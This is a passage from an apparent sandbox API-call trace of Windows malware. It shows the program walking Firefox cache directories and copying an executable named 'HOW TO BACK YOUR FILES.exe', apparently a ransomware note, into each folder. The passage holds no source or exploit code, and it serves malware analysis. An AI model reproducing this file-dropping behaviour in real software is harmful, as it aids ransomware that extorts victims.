(lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\8\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.584] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.584] GetLastError () returned 0x0 [0104.584] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.584] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d940a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d940a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.584] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.584] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.585] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7" [0104.585] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5620 | out: hHeap=0x2b0000) returned 1 [0104.585] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0104.585] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7") returned 111 [0104.585] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7" [0104.585] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.585] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.585] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.586] GetLastError () returned 0x0 [0104.586] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.586] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.586] CloseHandle (hObject=0x120) returned 1 [0104.586] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.586] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.586] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d966bc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d966bc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.586] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.586] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.586] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6" [0104.586] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5538 | out: hHeap=0x2b0000) returned 1 [0104.586] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0104.586] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6") returned 111 [0104.586] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6" [0104.586] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.587] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\6\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.587] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.587] GetLastError () returned 0x0 [0104.587] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.587] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.588] CloseHandle (hObject=0x120) returned 1 [0104.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.588] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.588] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d966bc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d966bc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.588] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.588] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.588] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5" [0104.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5450 | out: hHeap=0x2b0000) returned 1 [0104.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a88 | out: hHeap=0x2b0000) returned 1 [0104.588] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5") returned 111 [0104.588] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5" [0104.588] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.588] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.589] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.589] GetLastError () returned 0x0 [0104.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.589] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.589] CloseHandle (hObject=0x120) returned 1 [0104.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.589] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.589] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb64f2970, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d966bc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d966bc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.589] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.589] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.590] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4" [0104.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5368 | out: hHeap=0x2b0000) returned 1 [0104.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a68 | out: hHeap=0x2b0000) returned 1 [0104.590] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4") returned 111 [0104.590] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4" [0104.590] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.590] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\4\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.590] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.591] GetLastError () returned 0x0 [0104.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.591] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.591] CloseHandle (hObject=0x120) returned 1 [0104.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.591] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.591] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb64f2970, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d966bc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d966bc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.591] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.591] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.591] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3" [0104.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5280 | out: hHeap=0x2b0000) returned 1 [0104.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a48 | out: hHeap=0x2b0000) returned 1 [0104.591] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3") returned 111 [0104.591] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3" [0104.591] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.592] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.593] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.593] GetLastError () returned 0x0 [0104.593] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.593] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.593] CloseHandle (hObject=0x120) returned 1 [0104.593] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.593] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.593] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb64f2970, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d966bc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d966bc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.594] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.594] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.594] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B" [0104.594] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0104.594] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a48 | out: hHeap=0x2b0000) returned 1 [0104.594] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B") returned 114 [0104.594] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B" [0104.594] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.594] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\4b\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.595] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.595] GetLastError () returned 0x0 [0104.595] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.595] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.595] CloseHandle (hObject=0x120) returned 1 [0104.595] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.595] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.595] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb727c690, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6bb93420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bb93420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.595] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.595] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.596] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2" [0104.596] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5198 | out: hHeap=0x2b0000) returned 1 [0104.596] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a28 | out: hHeap=0x2b0000) returned 1 [0104.596] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2") returned 111 [0104.596] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2" [0104.596] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR 